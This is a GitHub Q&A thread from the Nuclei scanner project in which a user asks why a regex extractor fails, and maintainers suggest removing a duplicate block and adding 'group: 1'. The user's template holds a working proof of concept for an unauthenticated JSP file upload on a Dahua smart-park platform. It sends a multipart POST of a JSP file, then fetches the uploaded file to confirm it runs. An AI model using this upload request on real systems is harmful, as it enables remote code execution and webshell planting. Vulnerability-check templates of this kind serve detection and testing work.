### DISCUSSION TITLE
Questions about regex in the Nuclei.

### DISCUSSION THREAD

**Discussion by qianbenhyu** [projectdiscovery/nuclei#4115] [Q&A]
when I write a template, I meet a problem.
as you see, debug tells me "resolved variables found: xxx", I tried twice, but cannot deal with it.
![image](https://github.com/projectdiscovery/nuclei/assets/32768810/20c2ddd5-fa78-450a-ad6c-80ff64284f35)

**Comment by tarunKoyalwar** [comment]
@qianbenhyu , from limited view of your template it seems like you are adding `-raw` twice (which is like a boundary for matchers/extractors` just remove that last one and it should work now

**Comment by qianbenhyu** [comment]
it cannot works, 
such response like 
```
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json;charset=UTF-8
Date: Thu, 24 Aug 2023 02:29:46 GMT
Server: Apache-Coyote/1.1

{"code":1,"data":"ico_res_e2d16c4abe1b_on.jsp"}
```
regex:
```
    extractors:
      - type: regex
        name: xxx
        part: body
        regex:
          - 'ico_res_(.*?)_on.jsp'
        internal: true
```

**Comment by qianbenhyu** [comment]
> @qianbenhyu , from limited view of your template it seems like you are adding `-raw` twice (which is like a boundary for matchers/extractors` just remove that last one and it should work now

it cannot works,
such response like

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json;charset=UTF-8
Date: Thu, 24 Aug 2023 02:29:46 GMT
Server: Apache-Coyote/1.1

{"code":1,"data":"ico_res_e2d16c4abe1b_on.jsp"}
regex:

    extractors:
      - type: regex
        name: xxx
        part: body
        regex:
          - 'ico_res_(.*?)_on.jsp'
        internal: true

**Comment by ehsandeep** [comment]
@qianbenhyu it should work, do you have an example / complete template to share?

<img width="1773" alt="image" src="https://github.com/projectdiscovery/nuclei/assets/8293321/33e38b46-2e7b-43cc-b746-22756b289231">

**Comment by qianbenhyu** [comment]
> @qianbenhyu it should work, do you have an example / complete template to share?
> 
> <img alt="image" width="1773" src="https://user-images.githubusercontent.com/8293321/264655015-33e38b46-2e7b-43cc-b746-22756b289231.png">
```yaml
id: dahua_zhihuiyuanqu_info_leak

info:
  name: dahua_zhihuiyuanqu_rce
  author: huangyu
  severity: high
  description: fofa:WPMS/asset/lib/gridster/
  reference:
    - https://github.com/sunyixuan1228/cve/blob/main/RuiJie-EG.md
  tags: tags

requests:
  - raw:
      - |
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        User-Agent: Java/1.8.0_345
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Content-Length: 243
        Connection: close

        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        Content-Disposition: form-data; name="upload"; filename="1.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary

        <%out.println("{{randstr}}");%>
        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
        
      - |
        GET /upload/emap/society_new/ico_res_(.*?)_on.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Java/1.8.0_345
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: close

    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

    extractors:
      - type: regex
        name: xxx
        part: body
        regex:
          - 'ico_res_(.*?)_on.jsp'
        internal: true
    ```

**Comment by ehsandeep** [comment]
@qianbenhyu you need to use `group: 1`.

```yaml
    extractors:
      - type: regex
        name: xxx
        group: 1
        part: body
        regex:
          - 'ico_res_(.*?)_on.jsp'
        internal: true
```
